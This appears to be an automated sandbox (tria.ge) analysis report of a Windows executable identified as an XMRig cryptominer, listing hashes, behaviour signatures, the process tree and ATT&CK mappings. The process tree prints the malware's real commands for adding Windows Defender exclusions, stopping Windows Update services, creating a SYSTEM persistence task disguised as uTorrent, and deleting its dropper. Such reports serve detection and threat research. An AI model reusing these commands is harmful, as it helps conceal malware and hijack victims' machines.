Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
-
submitted
25/12/2024, 14:49
General
-
Target
JaffaCakes118_998997122e364144750a72db4049d50e38e6a879b0c67bd92ff5f6a549c7f2f5.exe
-
Size
680.4MB
-
MD5
b7b4e0558eb6188abc6e17d77abb4f73
-
SHA1
22851c79469486055efc62599a25eb4e1f8cc8b1
-
SHA256
998997122e364144750a72db4049d50e38e6a879b0c67bd92ff5f6a549c7f2f5
-
SHA512
638827eb702d032bf9f045854c1a79cd3bb841c9147ddd66fce98d91072bcd67338ae7214a248f8b0c8e43a68c8af48d2991a5ecae9df4e35666cf0477529cc3
-
SSDEEP
196608:gomVwAoiSs79XEVmNmbGHDoKUrUNQ9SzsIW8YtuNfU/:goqwAoSREVmDjzfIuNfU/
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 11 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 5 IoCs
-
Themida packer 15 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_998997122e364144750a72db4049d50e38e6a879b0c67bd92ff5f6a549c7f2f5.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_998997122e364144750a72db4049d50e38e6a879b0c67bd92ff5f6a549c7f2f5.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\[New]3.exeC:\Users\Admin\AppData\Roaming\[New]3.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\[New]crypted.exeC:\Users\Admin\AppData\Roaming\[New]crypted.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kssonkvq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'AppData' /tr '''C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'AppData' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn AppData /tr "'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "AppData"2⤵
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\[New]3.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kssonkvq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'AppData' /tr '''C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'AppData' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn AppData /tr "'C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3A645074-646E-457C-BA71-54CF3BF4C3FE} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe"C:\Program Files\WindowsAps\MicrosoftXboxGamingOverlay\uTorrent.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD50deddb3cd02f97a1b29228e249b3b365
SHA1fecda2c925798a04ad17871124a441dd96ae1730
SHA256f347f9e4d3dd0ce266a5d225c0471e33386c659c6c2425a1b2e625864e538b9b
SHA51223d186926572a79bd7cec17ddfc8dc49e97097636cf34cdbc4a8b3d6b590362635cb41200da96385cbc9da4d255cef65bf5bf2cd964c37c331ef9d1dec50eeb0
-
Filesize
13B
MD564a1339085eda776b01251c5994ea18e
SHA1db191a5da47c8a6f5d90c82ec3ab7cd9b110d5a2
SHA25698931cd12d774f86fac2b7d1281c3f95f955d1f708aabaae324baed325f3530e
SHA5124bb1c794ced2056b4b54198c565534395ff5fadc3e4b8c68d47af78ab568c0bb926e35becd31f5c439d8cdb688130d8660dd05cbc38a54aa6cae388c5b8fd38c
-
Filesize
7KB
MD5dac32a572bbb15c14622175c9d1dd28e
SHA1d349cf80f34c7f264b949ecec6a03f68aacee5f7
SHA256218511b1120bcb20d21dfb6fb3fcc39a419d2c84628911ad8345041e041679b9
SHA512f3ab4f80102b5a1e5c1e1cf1194b66c4801fc48e4d8a9cf2e4aec39326b719a7684026944ebfea5aa832833e7541a1d16ec5c9102002a884554a03e736ba8810
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
128KB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
14.8MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
14.8MB
-
Filesize
4KB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
14.8MB
-
Filesize
120KB
-
Filesize
120KB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
8KB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
14.8MB
-
Filesize
168KB
-
Filesize
168KB